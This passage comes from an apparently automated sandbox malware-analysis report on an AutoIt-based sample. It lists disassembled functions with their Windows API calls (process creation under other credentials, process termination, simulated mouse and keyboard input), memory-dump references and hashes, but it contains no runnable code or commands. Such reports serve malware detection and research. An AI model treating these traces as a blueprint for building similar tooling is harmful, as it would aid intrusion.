                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0053710F
                                                                                                                        • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
                                                                                                                      • GetCursorPos.USER32(?), ref: 0053713B
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00537199
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 4008ac35c624ad52c5a440746898cc2a2ad58982310dc0af18b06d83034bbc55
                                                                                                                      • Instruction ID: a244bac33999ec3fa69a7461838e2932f139271ac48ad8ef8fb36008c54a8855
                                                                                                                      • Opcode Fuzzy Hash: 4008ac35c624ad52c5a440746898cc2a2ad58982310dc0af18b06d83034bbc55
                                                                                                                      • Instruction Fuzzy Hash: 6131D27250930AABD720DF54D849F9BBBE9FF89314F000919F58597191D630EA09CB92
                                                                                                                      Function 00518879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005180C0
                                                                                                                        • Part of subcall function 005180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005180CA
                                                                                                                        • Part of subcall function 005180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005180D9
                                                                                                                        • Part of subcall function 005180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005180E0
                                                                                                                        • Part of subcall function 005180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005180F6
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,0051842F), ref: 005188CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005188D6
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 005188DD
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 005188F6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0051842F), ref: 0051890A
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00518911
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: 20d087a7674a440daa24c71ce469afb9ceeaf88b50a0d1eb7f01188cfb24f871
                                                                                                                      • Instruction ID: 5382bc532c81e6f0be276f4dae00f06ea8cca398f39b94c361c5d9731ae696cf
                                                                                                                      • Opcode Fuzzy Hash: 20d087a7674a440daa24c71ce469afb9ceeaf88b50a0d1eb7f01188cfb24f871
                                                                                                                      • Instruction Fuzzy Hash: 3B11AF35501209FFEB209FA8DC09BFE7BA8FB85315F104468F84597110CB32A984EB60
                                                                                                                      Function 005185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005185E2
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 005185E9
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005185F8
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00518603
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00518632
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00518646
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: 7fe7ee1faae16b1532ba00ca1d49703c6b831f02cef0daedbdb221369129bfa9
                                                                                                                      • Instruction ID: 03475469ae0069fbecf2040460717988375567552e6eb4be73b2843432b19bbb
                                                                                                                      • Opcode Fuzzy Hash: 7fe7ee1faae16b1532ba00ca1d49703c6b831f02cef0daedbdb221369129bfa9
                                                                                                                      • Instruction Fuzzy Hash: B1118976100209ABEF118FA8DC48FEE7BA9FF49348F044024FE05A2160C7768DA4EB60
                                                                                                                      Function 0051B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0051B7B5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0051B7C6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0051B7CD
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0051B7D5
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0051B7EC
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0051B7FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: 07c15e4271628a6496a2a58c45e9efe7052669c26c3f449dce8f1c0a69602dbd
                                                                                                                      • Instruction ID: 357269074b34e91a13a5032af38c67a834c70e6c5d7e6cb46d4be8f8c4985a17
                                                                                                                      • Opcode Fuzzy Hash: 07c15e4271628a6496a2a58c45e9efe7052669c26c3f449dce8f1c0a69602dbd
                                                                                                                      • Instruction Fuzzy Hash: 010184B5E00319BBEB109BBA9C49A9EBFB8EB59351F044075FA08A7291D6309C00CF90
                                                                                                                      Function 004E0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E0193
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 004E019B
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E01A6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E01B1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004E01B9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E01C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: 5192b0d2df41c344f5229fda0552a0c0f91ca9561153dcb34e2b6a04b5f3f7ea
                                                                                                                      • Instruction ID: 0b4fe23006a6c834ebea93d0c7d13a4ba9fd5da93c0cd00399e01194e172c769
                                                                                                                      • Opcode Fuzzy Hash: 5192b0d2df41c344f5229fda0552a0c0f91ca9561153dcb34e2b6a04b5f3f7ea
                                                                                                                      • Instruction Fuzzy Hash: 0B016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                                                                                      Function 005253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005253F9
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0052540F
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0052541E
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0052542D
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00525437
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0052543E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: c7aeaa6cbd45fa1d6304d0d99b0d0ccda133334c7f9cd70d1a1c5a6c7a3e9bf2
                                                                                                                      • Instruction ID: a154745f8f6380e98efedee344d20358a538f7e7f07b4165232b0aaaa30d1710
                                                                                                                      • Opcode Fuzzy Hash: c7aeaa6cbd45fa1d6304d0d99b0d0ccda133334c7f9cd70d1a1c5a6c7a3e9bf2
                                                                                                                      • Instruction Fuzzy Hash: CCF06D36240158BBE7215BA6DC0DEEB7A7CEFD7B1AF000169FA04D1090A7A01A05D7B5
                                                                                                                      Function 00527230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00527243
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,004D0EE4,?,?), ref: 00527254
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,004D0EE4,?,?), ref: 00527261
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,004D0EE4,?,?), ref: 0052726E
                                                                                                                        • Part of subcall function 00526C35: CloseHandle.KERNEL32(00000000,?,0052727B,?,004D0EE4,?,?), ref: 00526C3F
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00527281
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,004D0EE4,?,?), ref: 00527288
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: e33c5e8690f71a3aa70331a0e09fbbb20b975c8767779793f23b0d8c1fd44af8
                                                                                                                      • Instruction ID: 7482a8ae70d736227a79e4cd46fe6ff37de9a26f766f592f917df7a37410cdea
                                                                                                                      • Opcode Fuzzy Hash: e33c5e8690f71a3aa70331a0e09fbbb20b975c8767779793f23b0d8c1fd44af8
                                                                                                                      • Instruction Fuzzy Hash: 1AF0823E548612EBE7112B68FD4C9DB7B79FF5B706B100531F503A10A0CBB65815DB60
                                                                                                                      Function 00518992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0051899D
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 005189A9
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005189B2
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005189BA
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005189C3
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005189CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: e229fcf51981d31fef23765413a26f9ca4da4d5cf94bd112d0506f7bfd1bbfff
                                                                                                                      • Instruction ID: 78153e66fc98864752d8cc4585ae1ed73b7573313a3f3adbd4ba9077d3c15d22
                                                                                                                      • Opcode Fuzzy Hash: e229fcf51981d31fef23765413a26f9ca4da4d5cf94bd112d0506f7bfd1bbfff
                                                                                                                      • Instruction Fuzzy Hash: D2E0ED3A004001FBD7011FE9EC0C986BFB9FFAA7267105630F215C1470CB325424EB50
                                                                                                                      Function 00517530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 005176EA
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517702
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0054FB80,000000FF,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517727
                                                                                                                      • _memcmp.LIBCMT ref: 00517748
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                      • String ID: ,,U
                                                                                                                      • API String ID: 314563124-3961956419
                                                                                                                      • Opcode ID: 25291ea0fd0af49f1877fa0845319bc6b6a5488bfa3837a9013134f8a1bd0c86
                                                                                                                      • Instruction ID: fbeb51e070996f598247da288d7ba7003ed52fc659194ca29ab2066fa12e2a60
                                                                                                                      • Opcode Fuzzy Hash: 25291ea0fd0af49f1877fa0845319bc6b6a5488bfa3837a9013134f8a1bd0c86
                                                                                                                      • Instruction Fuzzy Hash: F3814075A00109EFDB04DFA8C984EEEBBB9FF89315F204558F505AB250DB71AE45CB60
                                                                                                                      Function 005385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00538613
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00538722
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0053889A
                                                                                                                        • Part of subcall function 00527562: VariantInit.OLEAUT32(00000000), ref: 005275A2
                                                                                                                        • Part of subcall function 00527562: VariantCopy.OLEAUT32(00000000,?), ref: 005275AB
                                                                                                                        • Part of subcall function 00527562: VariantClear.OLEAUT32(00000000), ref: 005275B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: 1b8301b7626ec6d43641777040e45416293462b6cffb8bcfcaeed9c45cebb86d
                                                                                                                      • Instruction ID: 86a17756ec6ae250003fcf4985d0049982a26e8ddbb50bad582bbb176a7695e5
                                                                                                                      • Opcode Fuzzy Hash: 1b8301b7626ec6d43641777040e45416293462b6cffb8bcfcaeed9c45cebb86d
                                                                                                                      • Instruction Fuzzy Hash: F19189746083019FCB04DF25C48596ABBE4FF89714F148D6EF89A8B361DB31E945CB92
                                                                                                                      Function 00522A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
                                                                                                                      • _memset.LIBCMT ref: 00522B87
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00522BB6
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00522C69
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00522C97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                      • Opcode ID: 624cced196bd067242716bf77d458c36cf780fdaa2fe2557bf49c92882e1df8e
                                                                                                                      • Instruction ID: 6fd234390ae7c7bc1da4788cc69ef586d9415a023f7471d6a8bf7e4b982665f6
                                                                                                                      • Opcode Fuzzy Hash: 624cced196bd067242716bf77d458c36cf780fdaa2fe2557bf49c92882e1df8e
                                                                                                                      • Instruction Fuzzy Hash: 2151E039508320BAD724AE29E845A6F7FE4BF96314F040A2EF894E32D0DB74CC449B52
                                                                                                                      Function 004D3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_free
                                                                                                                      • String ID: 3cM$_M
                                                                                                                      • API String ID: 2620147621-23921487
                                                                                                                      • Opcode ID: 5bdfff7bf847940cced84bf111b5a0aac4fa0b42909d97c0d0b1de5e42b64524
                                                                                                                      • Instruction ID: f3152cd536141a1b3dad00ac5fad8a584b421dbb626b18f99b334649501eb0ca
                                                                                                                      • Opcode Fuzzy Hash: 5bdfff7bf847940cced84bf111b5a0aac4fa0b42909d97c0d0b1de5e42b64524
                                                                                                                      • Instruction Fuzzy Hash: 88516771A043418FDB24CF29C890A6FBBE5BF85305F48482EE98987351EB39E941CB47
                                                                                                                      Function 004D6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_memmove
                                                                                                                      • String ID: 3cM$ERCP
                                                                                                                      • API String ID: 2532777613-544494106
                                                                                                                      • Opcode ID: 224379c04dd26268c9ecc96a9011619fa8123f5f7bdfea8f2d9d25cd295567f8
                                                                                                                      • Instruction ID: 534539363dd44380083699e08f82d8f13ba54b2025d5b09f3fcd18cd189b36ba
                                                                                                                      • Opcode Fuzzy Hash: 224379c04dd26268c9ecc96a9011619fa8123f5f7bdfea8f2d9d25cd295567f8
                                                                                                                      • Instruction Fuzzy Hash: 56519071900305DBDB24DF65C951BABBBE4BF44304F2185AFE94AC7381E774AA84CB54
                                                                                                                      Function 00522753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 005227C0
                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005227DC
                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00522822
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00585890,00000000), ref: 0052286B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
